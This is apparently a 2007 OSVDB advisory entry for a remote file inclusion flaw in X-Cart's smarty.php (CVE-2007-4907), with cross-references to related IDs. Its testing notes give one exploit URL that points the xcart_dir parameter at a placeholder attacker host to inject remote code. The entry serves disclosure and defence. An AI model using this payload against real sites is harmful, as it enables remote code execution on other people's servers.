X-Cart smarty.php xcart_dir Variable Remote File Inclusion

2007-09-11T00:00:00
ID OSVDB:38974
Type osvdb
Reporter OSVDB
Modified 2007-09-11T00:00:00

Description

Manual Testing Notes

http://[target]/[xcart-path]/smarty.php?xcart_dir=http://[attacker]/[inject]?

References:

Related OSVDB ID: 38972
Related OSVDB ID: 38973
Related OSVDB ID: 38975
Related OSVDB ID: 38976
Related OSVDB ID: 38977
ISS X-Force ID: 36574
Generic Exploit URL: http://www.milw0rm.com/exploits/4396
CVE-2007-4907
Bugtraq ID: 25637